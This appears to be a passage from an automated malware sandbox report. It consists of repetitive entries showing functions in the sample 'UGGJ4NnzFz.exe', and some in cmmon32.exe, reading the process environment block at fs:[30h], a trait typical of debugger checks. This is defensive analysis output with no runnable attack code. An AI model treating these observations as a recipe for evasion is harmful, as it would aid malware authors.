          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00995210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00995210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00995210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00995210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A68A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A24257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A65BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A4D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A68B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A16CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A68CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A16C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A48DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A16DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A16DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A68D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A1A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A13540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A43D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A4FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A68ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A4FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009C8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A51608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_0099E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A5AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009A8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A17794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A17794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A17794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009D37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009BB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A6070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A6070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_009CE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00A2FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00994F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\UGGJ4NnzFz.exeCode function: 1_2_00994F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045AA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0460C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_0459746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 9_2_045F6C0A mov eax, dword ptr fs:[00000030h]
